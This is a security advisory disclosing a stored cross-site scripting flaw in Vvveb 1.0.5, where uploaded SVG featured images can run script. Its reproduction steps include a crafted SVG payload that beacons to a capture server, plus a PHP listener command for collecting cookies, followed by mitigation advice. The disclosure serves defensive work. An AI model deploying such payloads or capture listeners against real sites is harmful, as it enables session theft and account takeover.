DELTA OBSCURA

We are the team behind Mission Cyber Sentinel, a mission dedicated to securing 446,000 digital assets globally.

GitHub

Vvveb - v1.0.5 - Cross-Site Scripting via SVG

By 0xhamy 05:02 PM - October 22nd 2025
Type software
Product Environment web
Product Name Vvveb
Product Vendor givanz
Product Version 1.0.5
Product Link https://github.com/givanz/Vvveb
Vulnerability Name Cross-Site Scripting
Severity High
CVSS String CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CVSS Score 8.7
CVE ID CVE-2025-8976
Vendor Acknowledgement Yes
Affected digital Assets 268
Affected Users 26800
Date of Reporting Jan 03, 2025
PoC Exploit https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Credit 0xhamy

Description

Vvveb 1.0.5 is vulnerable to authenticated stored XSS via the Featured Media upload on posts and pages.
Editors can upload a crafted SVG as the featured image; when a viewer opens that SVG directly (e.g., in a new tab), script or exfiltration logic can execute in the site’s origin, enabling session theft and privileged actions against other authenticated users (including admins/super admins).

Vulnerability Details

The post/page editors at:

  • /vadmin123/index.php?module=content/post&type=post
  • /vadmin123/index.php?module=content/posts&type=page

accept SVG as “Featured Media” without adequate sanitization. Because SVG is an active document format, opening it as a top-level document (e.g., right-click → Open image in new tab) can execute attacker-controlled content (e.g., <script>, event handlers, external beacons).
This creates a stored payload that any authenticated user (editor/admin) can inadvertently trigger, allowing cookie/session exfiltration and authenticated actions via the victim’s session.

Steps to Reproduce

  1. List or open posts/pages.

    http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page

  2. Edit a specific item.

    http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page

  3. Upload a malicious SVG as “Featured Media.”
    Example (creates an SVG that lures users to open it and beacons to an attacker server):

    echo '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300">
  <rect width="300" height="300" fill="red"/>
  <text x="150" y="250" font-size="12" fill="white" text-anchor="middle" alignment-baseline="middle">
    Please open the image in a new tab to see it
  </text>
  <image href="http://127.0.0.1:1718/capture.php" width="300" height="200"/>
</svg>' > payload.svg

    Upload payload.svg as the featured image and save the post/page.

  4. Trigger the payload.
    Open the image by its full path (or right-click → Open image in new tab):

    http://127.0.0.1/media/payload.svg

    Observe the outbound request to:

    http://127.0.0.1:1718/capture.php

  5. (Optional) Listener setup.
    Use the cookie-capture PHP from your gist and run:

    php -S 0.0.0.0:1718

    Confirm incoming requests when the SVG is opened.

Recommendation

  • Disallow or sanitize SVG uploads (strip scripts, event handlers, external references; serve as image/svg+xml with sanitization or convert to safe raster).
  • Serve uploaded media with strict headers: Content-Security-Policy denying inline script and restricting img-src/connect-src; consider X-Content-Type-Options: nosniff.
  • Validate file types server-side and restrict featured images to safe raster formats (PNG/JPEG/WebP).
  • Separate media origin (serve user uploads from a different domain to prevent same-origin script execution).